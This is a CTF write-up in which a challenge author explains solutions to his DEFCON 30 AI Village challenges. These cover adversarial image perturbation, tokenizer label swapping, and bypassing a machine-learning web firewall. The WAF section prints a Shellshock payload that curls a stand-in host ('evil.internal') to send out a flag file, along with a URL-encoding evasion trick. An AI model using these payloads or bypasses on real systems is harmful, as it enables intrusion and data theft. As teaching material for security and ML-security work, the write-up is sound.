0-Days and Tokens and Salts, Oh My! (An overview of my DEFCON AIV CTF Challenges)
--
I wrote five CTF challenges for the DEFCON 30 AI Village Capture The Flag, so I thought I would write a blog post about the solutions and inner workings of the challenges, especially WAF and Token. These two used radically different techniques to the majority of the CTF and seemed to take a lot of the community by surprise, partly because their source code was hidden.
Context
For DEFCON 30, the AI Village organized an AI Capture The Flag competition hosted on Kaggle. The goal of a CTF is usually to hack or break a system to uncover a flag hidden somewhere within it. For the AI CTF, the goals were generally less focused on vulnerabilities and more on adversarial samples and model poisoning. The competition ran from the 12th of August to the 12th of September 2022. In the end, 3,555 individuals joined the competition, with 668 participants making a submission. Kaggle also put up $25,000 in prizes, which was incredible.
Whoami
I’m JankhJankh, a Penetration Tester from Australia, where I specialize in red teaming and infrastructure-level web attacks. AI hacking research has been my hobby for a few years now; I’ve given a talk and run a workshop on pentesting ML with the goal of helping to build maturity in the field.
My ML background comes from my engineering degree, where I did my honours in developing Multimodal Neural Networks for textile identification to automate clothing recycling.
My Challenges
I provided the following challenges for the DEFCON 30 AI Village CTF:
- Forensics
- Theft
- Salt
- WAF
- Token
These challenges were part of a workshop I ran in Australia earlier in the year. That workshop was white-box, with each user being provided all source code for the challenges other than flags and major spoilers.
The entire workshop is now available online if you would like to try the remaining 10 or so challenges, which I highly recommend, as they include a number of challenges that were difficult to make multi-player, such as dataset poisoning and code execution challenges.
https://github.com/JankhJankh/aictf
PS: I wrote a lot of these challenges in the early days of COVID, so a lot of the libraries are out of date. Luckily, the Docker container in the repository will handle all of that for you.
FORENSICS
While you can solve this by just running strings on the file and grepping for a flag, the goal was to give intro-level people a flag just for loading a model and looking at what is inside it.
import tensorflow as tf
model = tf.keras.models.load_model('./forensics.h5')
model.get_config()
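For anyone who went the strings route instead, the same idea can be sketched in pure Python. This is a rough sketch: the minimum run length and the "flag" search pattern here are assumptions, and the blob stands in for the real model file.

```python
import re

def find_strings(data: bytes, pattern=b"flag", min_len=4):
    """Rough Python equivalent of `strings forensics.h5 | grep -i flag`:
    extract printable-ASCII runs, keep those containing the pattern."""
    runs = re.findall(rb"[ -~]{%d,}" % min_len, data)
    return [r.decode() for r in runs if pattern in r.lower()]

# Demo on an in-memory blob standing in for the model file:
blob = b"\x00\x01layer_1\x00DEFCON{example_flag}\x00weights"
print(find_strings(blob))  # ['DEFCON{example_flag}']
```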
THEFT
This challenge was initially built as a web app, so users have to retrieve the encrypted model and then decrypt it to retrieve the pickle file within (it’s AES-CBC with a password from rockyou). The server also returns confidences, so you can do an online attack rather than an offline attack if you want to circumvent the decryption stage.
Once you have the model, the sample exploit code provided (https://tcode2k16.github.io/blog/posts/picoctf-2018-writeup/general-skills/#solution-20) gets you 90% of the way there; just change the class names and class IDs.
# Changed lines from the starting code:
TURTLE_IDX = 33
TURTLE_STR = "loggerhead"

if __name__ == "__main__":
    create_img("./owl.jpg", "./owl_turtle.png", "./model.h5", TURTLE_STR, TURTLE_IDX)
    assert is_similar_img("./owl.jpg", "./owl_turtle.png")
The full solution code can be found here:
https://github.com/JankhJankh/aictf/blob/main/Solution%20Scripts/theft123/other.py
Executing this script will slightly modify the image, as seen below.
SALT
The secret sauce of SALT is that the randomness added to each image is reasonably small: just big enough to break most solutions to Theft. By cranking up the strength of your own perturbation, you can make your changes outperform the random changes the application makes.
# Changed lines from the starting code are the same as Theft, except the
# final np.clip bounds, which have been changed from -1.0, 1.0 to -10.0, 10.0
OWL_IDX = 24
OWL_STR = "great_grey_owl"

while cost < 0.99:
    cost, gradients = grab_cost_and_gradients_from_model([hacked_image, 0])
    hacked_image += np.sign(gradients) * learning_rate
    hacked_image = np.clip(hacked_image, max_change_below, max_change_above)
    hacked_image = np.clip(hacked_image, -10.0, 10.0)
    print("Model's predicted likelihood that the image is a " + target_str + ": {:.8}%".format(cost * 100))

hacked_image = hacked_image.reshape((224, 224, 3))
img = array_to_img(hacked_image)
img.save(img_res_path)

if __name__ == "__main__":
    create_img("./turtle.jpg", "./turtle_owl.png", "./model.h5", OWL_STR, OWL_IDX)
    assert is_similar_img("./turtle.jpg", "./turtle_owl.png")
Executing this script will slightly modify the image, as seen below.
You can also beat this with any kind of adversarial technique that is stronger than the salt used to prevent adversarial attacks. As a whole, it’s pretty tough to balance model accuracy against any kind of salting defence.
THEFT AND SALT
Combining the solutions to Theft and Salt leaves you with one of my all time favourite tables:
If you liked these two challenges, the workshop has four more like them: two about extracting the models and two with different salting techniques to bypass.
TOKEN
Token was originally designed as a white-box CTF challenge, with participants being given the source code. This challenge is based on a bug I found in another challenge of mine while making it.
The solution requires no brute force; however, if you haven’t messed around with tokenizers, a little targeted brute forcing could help. To anyone who decided to brute force all ~3 million combinations to get the solution, I hope you find the real solution enlightening. You also probably owe Joe and Moo a drink for all the times you overloaded that host.
The goal of this challenge is simple. A server uses a sentiment analysis model to classify the word SECRETKEY. This model has been trained on a wordlist which you are provided, and you can tell the server to remove two lines from this wordlist before the model uses it to classify the word SECRETKEY.
Before we discuss this challenge, it is important to discuss what a tokenizer is, both categorically and in its specific Python implementation. Every classification model has a step somewhere in its implementation where a labeling function replaces a class ID with its human-readable version. For example, CIFAR-10 has 10 classes, each with an ID between 0–9 (or 1–10 if you are cursed to still use MATLAB). At some point, class 0 must be converted to the word “airplane” so that humans can interpret the results of classification. This step is absolutely vital to the process, as swapping classes 0 and 1 will lead to consistently poisoned results between the two classes. Additionally, this step often takes place outside the model itself and lacks the scrutiny the rest of the model receives.
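As a toy illustration of how fragile this mapping is (the label list is the standard CIFAR-10 one; the lookup helper is hypothetical, not from any specific library):

```python
# The standard CIFAR-10 label list; the model outputs a bare class ID and
# this lookup turns it into a human-readable name.
CIFAR10_LABELS = ["airplane", "automobile", "bird", "cat", "deer",
                  "dog", "frog", "horse", "ship", "truck"]

def to_label(class_id, labels=CIFAR10_LABELS):
    return labels[class_id]

print(to_label(0))  # airplane

# Swapping two entries silently poisons every prediction for those classes,
# without touching the model weights at all.
poisoned = CIFAR10_LABELS.copy()
poisoned[0], poisoned[1] = poisoned[1], poisoned[0]
print(to_label(0, poisoned))  # automobile
```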
This labeling process changes drastically from implementation to implementation. The tokenizer is the Python text-labeling function that takes a dataset and returns a dictionary mapping every word used in the dataset to a corresponding class ID.
As you can probably tell from my heavy-handed infodump, the goal is to swap the label of SECRETKEY with something else. But how is this possible? Tokenizers return consistent results: if two people run a tokenizer over the same dataset, the words will be labeled in the same order. We can see this by viewing the tokenizer output for the provided CSV.
As you can see, secretkey is at class 4, meaning we would likely need to swap it with class 3 or class 5. By either reading the documentation or having a look through the CSV, you can identify that these classes are ordered by the frequency of each word in the dataset: “the” appears 408 times, “i” 320 times, “blank” 220 times, “secretkey” 216 times, and “and” 195 times. As the occurrence counts of “blank” and “secretkey” are only 4 apart, removing 4 occurrences of the word BLANK would leave both at 216 occurrences, and the only two rows in the dataset where this works are 337 and 493. Deleting these two rows and running the tokenizer again, we can see that the labels for “blank” and “secretkey” have swapped. As both words now have the same frequency, the first word encountered is given precedence*.
*To the best of my knowledge, I struggled to find documentation on this exact feature.
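A simplified model of this frequency-then-first-seen ordering can be sketched in plain Python. To be clear, this is my reading of the behaviour, not the tokenizer's actual implementation, which, as noted above, I couldn't find documented:

```python
from collections import Counter

def word_index(words):
    """Toy model of tokenizer ordering: rank words by frequency
    (descending), break ties by first appearance; IDs start at 1."""
    counts = Counter()
    first_seen = {}
    for i, w in enumerate(words):
        counts[w] += 1
        first_seen.setdefault(w, i)
    ranked = sorted(counts, key=lambda w: (-counts[w], first_seen[w]))
    return {w: i + 1 for i, w in enumerate(ranked)}

# "blank" appears 3 times, "secretkey" 2 times: blank outranks secretkey.
corpus = ["secretkey", "blank", "blank", "secretkey", "blank"]
print(word_index(corpus))       # {'blank': 1, 'secretkey': 2}

# Remove one "blank" so both appear twice: the tie now goes to whichever
# word was seen first, and the labels swap.
print(word_index(corpus[:-1]))  # {'secretkey': 1, 'blank': 2}
```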
However, submitting the numbers 337 and 493 is unsuccessful. This is because the CSV has a header row.
With the header row accounted for, these values are both off by one, making the final two CSV indexes 336 and 492 to get the flag.
These two numbers should be the only numbers that can synchronize the label successfully.
In case anyone was wondering whether the server just looks for these two numbers, I can assure you the server actually does these calculations every time. You can download a copy of the challenge from the workshop and try it yourself if you would like to see the magic in action.
When I first discovered it, I described this vulnerability as a Tokenizer Desynchronisation, and most people seem happy with that description. However, the attack can be applied to other labeling layers and processes, whether they are internal to the model or not, so a more appropriate name may be Label Desynchronisation. If you know of any stories or vulnerabilities where the labeling function itself was targeted, please send me a message, as I am aiming to collect a list of real-world vulnerabilities against this under-scrutinized pillar of the classification-model ecosystem.
WAF
As discussed in the challenge, a model has been trained to identify a 0-day vulnerability. The goal of the challenge was to identify the payload the Web Application Firewall (WAF) is built to block, and then bypass the WAF.
On the backend I used a very simple sentiment analysis model with the malicious payload inside it, so that it blocks the request if a known-malicious portion is visible.
We provided a sample base64-encoded malicious request to get people started:
mFzaC==
As many people raised throughout the CTF, this starting payload looks like nonsense. However, it was actually meant to guide the tester towards the correct solution: by prepending any base64 character to the start of this string, you get something far more legible.
amFzaC== -> jash
gmFzaC== -> .ash
If testers were familiar with “bash”, this might lead them to attempt “YmFzaA==”, which is also blocked by the WAF, whereas any other character would not be blocked (as the model is only trained to block one specific payload).
Note: if players lacked the intuition to try the word bash, this conclusion can also be arrived at by trying various modifications of the starting string. As the hint tells players that strings are assessed in blocks of 5, you can make any change to this starting string and it will no longer be blocked by the WAF.
Once a player has identified that they can distinguish malicious from non-malicious strings, they can submit payloads of 4 known-malicious characters and one test character. As the model tests strings in sets of 5, the entire base64 keyspace can be tested in a single request.
As the model stops at the first occurrence of a malicious string, you can pull out the final result, and that will be the malicious character:
As we now have a technique for identifying the malicious characters one at a time, we can loop this request until we no longer find a malicious character:
This slowly builds out the final payload:
?addenv=KCkgeyA6O307IC9iaW4vYmFzaC==
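The extraction loop can be simulated locally with a stand-in oracle. Both helpers below are purely illustrative: make_waf models the blocklist behaviour described above, and recover grows the payload one character at a time, whereas the real challenge required querying the server.

```python
import string

B64_CHARS = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/="

def make_waf(secret, block=5):
    """Local stand-in for the WAF: flags any string containing one of the
    secret payload's 5-character windows."""
    windows = {secret[i:i + block] for i in range(len(secret) - block + 1)}
    return lambda s: any(s[i:i + block] in windows
                         for i in range(len(s) - block + 1))

def recover(waf, known, block=5):
    """Grow the payload leftwards: prepend each candidate character to the
    first block-1 known characters and ask the oracle whether it is blocked."""
    while True:
        for c in B64_CHARS:
            if waf(c + known[:block - 1]):
                known = c + known
                break
        else:
            return known  # nothing blocked: we reached the payload's start

secret = "KCkgeyA6O307IC9iaW4vYmFzaC=="
print(recover(make_waf(secret), "mFzaC=="))  # KCkgeyA6O307IC9iaW4vYmFzaC==
```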
This payload does not work out of the box. As you can see, the base64 parameter is the only part of the string that the model was trained on: if you submit the entire string, the server will not be able to base64-decode it, and if you submit the base64-encoded string as-is, the WAF will block it, as it is trained to do.
The payload in question is Shellshock, a classic payload from back in the day.
To avoid mucking around with RCE and risking players DoSing each other, deleting the flag, and other such nonsense, I decided instead to give the flag to any player who sent me this Shellshock payload. Note that any payload that included this string would also work; I didn’t want to punish people for trying RCE. For example, the following payload would also return the flag to the player, as it contains the test string.
() { :;}; /bin/bash curl http://evil.internal/+`cat flag.txt`
If anyone would like to try the RCE version of this challenge, it and the rest of my challenges are available at https://github.com/JankhJankh/aictf
As mentioned, the WAF will block the exact payload required for the flag, so the additional step of a WAF bypass is required. Like all WAFs, there are a number of ways to bypass this one; the technique I most commonly find success with as a pentester is URL encoding: encoding each character so that the WAF reads a parameter in a different context to the final server. The following strings are functionally equivalent when viewed by a Flask web application; however, the WAF is not trained to block the latter.
YmFzaC==
%59%6d%46%7a%61%43%3d%3d
By URL encoding the entire payload, we can bypass the WAF and get the flag.
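In Python, fully percent-encoding a payload is a one-liner. The full_url_encode helper is a hypothetical name of my own; note that the standard urllib.parse.quote won't do here, as it leaves alphanumerics untouched.

```python
from urllib.parse import unquote

def full_url_encode(s):
    """Percent-encode every character, including the alphanumerics the WAF
    was trained on, so its tokenizer never sees the raw payload."""
    return "".join(f"%{ord(c):02x}" for c in s)

enc = full_url_encode("YmFzaC==")
print(enc)                          # %59%6d%46%7a%61%43%3d%3d
assert unquote(enc) == "YmFzaC=="   # the web framework decodes this back transparently
```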
To conclude, this challenge aimed to teach penetration testers the logic flows to consider when looking at an AI model. The hacking required is also introductory enough that I think data scientists can get most of it with a bit of googling.
If you would like to see a younger version of me theorize this style of attack well before I made my AI CTF, here is a link to my Intro to Penetration Testing ML talk.
https://www.youtube.com/watch?v=lcn_yFmz7h8&t=3s
Conclusion
The CTF went incredibly smoothly for the first one the AI Village has ever run, and a lot of infrastructure was set up that will make future CTFs run a lot smoother.
Thanks for reading. If you have any feedback or want to chat about my challenges, you can find me at:
- https://twitter.com/JankhJankh
- https://github.com/JankhJankh
- The AI Village Discord
Special shoutouts to @moo_hax and @josephtlucas for putting in an incredible amount of work getting the CTF up to such a high standard, and for keeping WAF and Token alive despite the immense amount of brute forcing these challenges copped during the competition.
Shoutouts to the other awesome folks who made challenges for the CTF:
@GTKlondike
@rharang
@comathematician
@ColdwaterQ
@BenevOrang
And a final shoutout to Kaggle for hosting the CTF and putting up 25k in prizes.